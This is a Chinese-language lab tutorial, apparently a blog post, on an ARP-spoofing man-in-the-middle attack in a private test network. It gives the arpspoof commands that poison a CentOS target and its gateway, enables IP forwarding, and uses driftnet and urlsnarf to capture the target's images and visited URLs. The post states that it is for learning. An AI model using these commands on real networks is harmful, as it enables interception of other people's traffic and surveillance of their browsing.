测试环境arpspoof 实施中间人攻击

1、测试环境准备

靶机:CentOS Linux release 7.5 (192.168.207.129)
攻击机:Kali Linux 2020.3(192.168.207.132)

查看网卡:ifconfig
测试环境arpspoof 实施中间人攻击_第1张图片
查看路由器IP:ip route show

在这里插入图片描述

2、startattack

2.1 kali转发IPv4网络数据包

sysctl -w net.ipv4.ip_forward=1

在这里插入图片描述

2.2 使用arpspoof拦截靶机的数据包

arpspoof -i 网卡 -t 靶机IP 路由器IP
arpspoof -i eth0 -t 192.168.207.129 192.168.207.2
测试环境arpspoof 实施中间人攻击_第2张图片

2.3 用arpspoof截获来自路由器的数据包

arpspoof -i 网卡 -t 路由器IP 靶机IP
arpspoof -i eth0 -t 192.168.207.2 192.168.207.129
在这里插入图片描述

2.4 driftnet 嗅探靶机访问的图片

driftnet -i 网卡
driftnet -i eth0
测试环境arpspoof 实施中间人攻击_第3张图片

2.5 urlsnarf嗅探靶机的访问的网址

urlsnarf -i 网卡
urlsnarf -i eth0
测试环境arpspoof 实施中间人攻击_第4张图片

2.6 攻击结束,关闭数据包路由功能

sysctl -w net.ipv4.ip_forward=0

在这里插入图片描述

注:driftnet只可嗅探到没有加密的图片

Mark ,仅用于学习分享!

你可能感兴趣的:(kali,安全)